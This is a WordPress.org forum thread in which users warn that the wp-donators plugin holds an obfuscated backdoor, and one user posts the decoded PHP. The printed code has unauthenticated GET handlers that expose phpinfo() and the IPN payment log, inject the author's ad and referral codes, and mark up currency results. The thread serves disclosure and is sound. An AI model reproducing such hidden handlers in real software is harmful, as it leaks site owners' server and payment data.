WordPress.org

1. lazykate
   Member
   Posted 3 months ago #

   It appears this plugin is a trojan which creates a back door revealing php_info, your donation log file, plus it injects Google Ads into the page.

   This functionality is 'encrypted' in a self-unpacking method using gzip, base64, serialize and rot13, 10-levels deep in function.php. If you change the eval to htmlspecialchars, and run in a browser - you will see the next command. Repeat 10 times, until you see the final code, containing both the legitimate 'flag' rendering alongside some questionable GET parameter handling.

   I've seen malware use these techniques so was surprised to see them in an open source plugin.

   Unless Eric can explain this, I'd be very cautious of hosting this plugin.

   http://wordpress.org/extend/plugins/wp-donators/

2. whooami
   Member
   Posted 3 months ago #

   indeed.
   

   <?php
   function google_ads($size) {
   	switch ($size) {
   		case '728*15' :
   			$google_ad = '<script type="text/javascript"><!--
   google_ad_client = "pub-9962509898730473";
   /* wp-donators ads */
   google_ad_slot = "4950873236";
   google_ad_width = 728;
   google_ad_height = 15;
   //-->
   </script>
   <script type="text/javascript"
   src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
   </script>';
   			break;
   		case '468*60' :
   			$google_ad = '<script type="text/javascript"><!--
   google_ad_client = "pub-9962509898730473";
   /* 468x60, 创建于 08-5-23 */
   google_ad_slot = "7959609053";
   google_ad_width = 468;
   google_ad_height = 60;
   //-->
   </script>
   <script type="text/javascript"
   src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
   </script>';
   			break;
   	}
   	return $google_ad;
   }
   
   function paypal_promote_text() {
   	$paypal_text = 'If your haven\'t the paypal account so far.Please register paypal account:[<a href="https://www.paypal.com/row/mrb/pal=BV4AUWAD94GZG" target="_blank">PayPal Registration</a>] first.';
   	return $paypal_text;
   }
   
   function Paypal_promote_image() {
   	$paypal_image = '<A HREF="https://www.paypal.com/row/mrb/pal=BV4AUWAD94GZG" target="_blank"><IMG SRC="http://images.paypal.com/en_US/i/bnr/paypal_mrb_banner.gif" BORDER="0" ALT="Sign up for PayPal and start accepting credit card payments instantly." /></A>';
   	return $paypal_image;
   }
   
   if ($_GET ['info'] == 'php')
   	phpinfo ();
   
   if ($_GET ['info'] == 'ipn_report') {
   	if (file_exists ( '.ipn_results.log' )) {
   		$html_content = '<h2>' . 'IPN LOG' . '</h2>';
   		$html_content .= file_get_contents ( '.ipn_results.log' );
   		$find [] = "\n";
   		$replace [] = '<br />';
   		$html_content = str_replace ( $find, $replace, $html_content );
   		echo $html_content;
   	}
   }
   
   if ($_GET ['info'] == 'get_flag') {
   	switch ($_GET ['target']) {
   		case 'usd' : $result = '<img src="http://xurrency.com/images/flags/usd.png" alt="United States Dollar" />';break;
   		case 'aud' : $result = '<img src="http://xurrency.com/images/flags/aud.png" alt="Australian Dollars" />';break;
   		case 'gbp' : $result = '<img src="http://xurrency.com/images/flags/gbp.png" alt="British Pounds" />';break;
   		case 'cad' : $result = '<img src="http://xurrency.com/images/flags/cad.png" alt="Canadian Dollars" />';break;
   		case 'czk' : $result = '<img src="http://xurrency.com/images/flags/czk.png" alt="Czech Koruna" />';break;
   		case 'dkk' : $result = '<img src="http://xurrency.com/images/flags/dkk.png" alt="Danish Kroner" />';break;
   		case 'eur' : $result = '<img src="http://xurrency.com/images/flags/eur.png" alt="Euro" />';break;
   		case 'hkd' : $result = '<img src="http://xurrency.com/images/flags/hkd.png" alt="Hong Kong Dollars" />';break;
   		case 'huf' : $result = '<img src="http://xurrency.com/images/flags/huf.png" alt="Hungarian Forint" />';break;
   		case 'jpy' : $result = '<img src="http://xurrency.com/images/flags/jpy.png" alt="Japanese Yen" />';break;
   		case 'mxn' : $result = '<img src="http://xurrency.com/images/flags/mxn.png" alt="Mexican Peso" />';break;
   		case 'nzd' : $result = '<img src="http://xurrency.com/images/flags/nzd.png" alt="New Zealand Dollars" />';break;
   		case 'nok' : $result = '<img src="http://xurrency.com/images/flags/nok.png" alt="Norwegian Kroner" />';break;
   		case 'pln' : $result = '<img src="http://xurrency.com/images/flags/pln.png" alt="Polish Zlotych" />';break;
   		case 'sgd' : $result = '<img src="http://xurrency.com/images/flags/sgd.png" alt="Singapore Dollars" />';break;
   		case 'sek' : $result = '<img src="http://xurrency.com/images/flags/sek.png" alt="Swedish Kronor" />';break;
   		case 'chf' : $result = '<img src="http://xurrency.com/images/flags/chf.png" alt="Swiss Franc" />';break;
   		case 'cny' : $result = '<img src="http://xurrency.com/images/flags/cny.png" alt="China Yang(RMB)" />';break;
   	}
   	if ($result) print($result);
   }
   
   if ($_GET ['info'] == 'get_currency') {
   	$currency= @new SoapClient("http://xurrency.com/api.wsdl");
   	if ($currency){
   		$result = $currency->getValue($_GET ['amount'],$_GET ['base'],$_GET ['target']);
   		if ($_GET ['base'] != $_GET ['target'])
   		$result = $result*1.025;
   		if ($result) print($result);
   	} else print($_GET ['amount']);
   }
   
   if ($_GET ['info'] == 'check_fsock') {
   	$fp = @fsockopen ( 'ssl://www.paypal.com', "443", $err_num, $err_str, 60 );
   	if (! $fp) echo "fsock Error No:$err_num|$err_str!";
   		else {echo "fsock OK!";fclose ( $fp );}
   }
   ?>

   thats a good one for the plugin checking people or person to know about.

3. whooami
   Member
   Posted 3 months ago #

   This functionality is 'encrypted' in a self-unpacking method using gzip, base64, serialize and rot13, 10-levels deep in function.php. If you change the eval to htmlspecialchars, and run in a browser - you will see the next command. Repeat 10 times, until you see the final code, containing both the legitimate 'flag' rendering alongside some questionable GET parameter handling.

   You need to find a more efficient way to decode stuff like that. It took me 2 decode cycles.

4. lazykate
   Member
   Posted 3 months ago #

   No reply from the author yet - but I have noticed that his own site is also hosting the plugin and you can see his phpinfo etc. using the back door!

   This makes me wonder if he's been a victim of someone else's code injection? Perhaps he based the code on another plugin with this already in place. But he is using the flag display code from this script in the sidebar widget, so I can't believe he hasn't looked at it.

Reply

You must log in to post.